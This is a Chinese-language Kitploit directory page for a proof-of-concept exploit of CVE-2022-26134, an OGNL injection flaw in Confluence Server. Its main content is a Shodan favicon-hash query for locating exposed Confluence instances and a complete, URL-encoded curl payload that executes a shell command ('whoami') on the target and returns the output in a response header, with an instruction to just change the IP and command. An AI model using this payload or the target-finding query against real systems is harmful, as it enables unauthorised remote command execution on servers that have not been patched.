Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Confluence-CVE-2022-26134 — 针对 Confluence Server 中 CVE-2022-26134 的概念验证漏洞利用,利用 OGNL 注入通过精心构造的 HTTP 请求执行命令。 | Kitploit
工具/GitHubGitHub/y000o/confluence-cve-2022-26134
侦察漏洞分析漏洞利用Web应用程序漏洞利用命令与控制
GitHuby000o/confluence-cve-2022-26134

Confluence-CVE-2022-26134

针对 Confluence Server 中 CVE-2022-26134 的概念验证漏洞利用,利用 OGNL 注入通过精心构造的 HTTP 请求执行命令。

查看仓库
4224年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Confluence-CVE-2022-26134

dork 和 shodan

root@kitploit:~
https://www.shodan.io/search?query=http.favicon.hash%3A-305179312&page=2

Curl 漏洞验证命令

root@kitploit:~
curl -v http://10.0.0.247:8090/%24%7BClass.forName%28%22com.opensymphony.webwork.ServletActionContext%22%29.getMethod%28%22getResponse%22%2Cnull%29.invoke%28null%2Cnull%29.setHeader%28%22X-Cmd-Response%22%2CClass.forName%28%22javax.script.ScriptEngineManager%22%29.newInstance%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22var%20d%3D%27%27%3Bvar%20i%20%3D%20java.lang.Runtime.getRuntime%28%29.exec%28%27whoami%27%29.getInputStream%28%29%3B%20while%28i.available%28%29%29d%2B%3DString.fromCharCode%28i.read%28%29%29%3Bd%22%29%29%7D/

只需修改 IP 和命令

下载工具